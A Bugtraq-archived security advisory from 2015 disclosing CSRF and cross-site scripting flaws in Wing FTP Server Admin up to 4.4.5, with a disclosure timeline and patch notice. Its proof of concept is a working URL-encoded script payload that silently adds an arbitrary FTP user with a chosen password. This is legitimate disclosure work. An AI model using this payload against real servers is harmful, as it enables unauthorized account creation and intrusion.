'CSRF & XSS Wing FTP Server Admin <= v4.4.5'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    CSRF & XSS Wing FTP Server Admin <= v4.4.5
From:       apparitionsec () gmail ! com
Date:       2015-04-28 17:04:12
Message-ID: 201504281704.t3SH4CYR009391 () sf01web3 ! securityfocus ! com
[Download RAW message or body]

Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities


Release Date:
=============
2015-04-28


Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt


Common Vulnerability Scoring System:
====================================
Overall CVSS Score 8.9


Product:
===============================
Wing FTP Server is a Web based administration FTP client that supports following \
protocols FTP, FTPS, HTTPS, SSH



Advisory Information:
==============================
CSRF & client-side cross site scripting web vulnerability within Wing FTP Server \
Admin that allows adding arbitrary users to the system.


Vulnerability Disclosure Timeline:
==================================
March 28, 2015: Vendor Notification 
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new version 4.4.6
April 28, 2015: Public Disclosure - John Page



Affected Product(s):
====================
Wing FTP Server Admin 4.4.5
Product: Wing FTP Server - Admin


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================


Request Method(s):
                                [+] POST & GET


Vulnerable Product:
                                [+] Wing FTP Server Admin <= 4.4.5


Vulnerable Parameter(s):
                                [+] domain & type


Affected Area(s):
                                [+] Server Admin


Proof of Concept (POC):
=======================
The CSRF and client-side cross site scripting web vulnerability can be exploited by \
remote attackers without privileged application user account and with low user \
interaction (click). Payload will add arbitrary users to the system.

PoC: Example

http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]

POC: Add arbitrary user:

http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_add \
user%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a% \
27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27% \
3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27m \
ax_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%2 \
7,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a \
0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_d \
ownload%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enab \
le_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quot \
a%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27, \
%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas
  ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27en \
able_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_en \
able_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27 \
limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27 \
%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27, \
%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pub \
key_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E



POC XSS:
http://localhost:5466/admin_viewstatus.html?domain=[XSS VECTOR]


POC XSS:
http://localhost:5466/admin_event_list.html?type=[XSS VECTOR]


Solution - Fix & Patch:
=======================
Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)


Security Risk:
==============
The security risk of the CSRF client-side cross site scripting web vulnerability in \
the `domain` admin_loglist.html value has CVSS Score of 8.9


Credits & Authors:
==================
John Page ( hyp3rlinx ) @apparitionsec


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
the security research reporter John Page disclaims all warranties, either expressed \
or implied, including the warranties of merchantability and capability for a \
particular purpose. apparitionsec or its suppliers are not liable in any case of \
damage, including direct, indirect, incidental, consequential loss of business \
profits or special damages.

Domains:  hyp3rlinx.altervista.org


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic